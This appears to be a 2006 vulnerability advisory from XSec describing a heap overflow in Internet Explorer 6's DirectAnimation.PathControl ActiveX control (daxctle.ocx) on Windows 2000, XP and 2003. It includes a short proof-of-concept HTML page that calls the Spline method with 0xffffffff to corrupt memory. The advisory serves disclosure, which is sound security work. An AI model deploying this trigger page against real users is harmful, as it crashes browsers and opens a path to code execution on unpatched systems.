[XSec-06-10]: Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
Advisory ID:
XSec-06-10
Advisory Name:
Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
Release Date:
08/28/2006
Tested on:
Windows 2000/XP/2003 Internet Explorer 6.0 SP1
Affected version:
Windows 2000
Windows XP
Windows 2003
Author:
nop <nop#xsec.org>
http://www.xsec.org
Overview:
When Internet Explorer handle DirectAnimation.PathControl COM
object(daxctle.ocx) \
Spline method, Set the first parameter to 0xffffffff will triggers an
invalid memory \
write, That an attacker may DoS and possibly could execute arbitrary code.
Exploit:
=============== daxctle.htm start ================
<!--
// Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
// tested on Windows 2000 SP4/XP SP2/2003 SP1
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
// Info: Microsoft DirectAnimation Path
// ProgID: DirectAnimation.PathControl
// InprocServer32: C:\WINNT\system32\daxctle.ocx
--!>
<html>
<head>
<title>test</title>
</head>
<body>
<script>
var target = new ActiveXObject("DirectAnimation.PathControl");
target.Spline(0xffffffff, 1);
</script>
</body>
</html>
=============== daxctle.htm end ==================
Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19
About XSec:
We are redhat.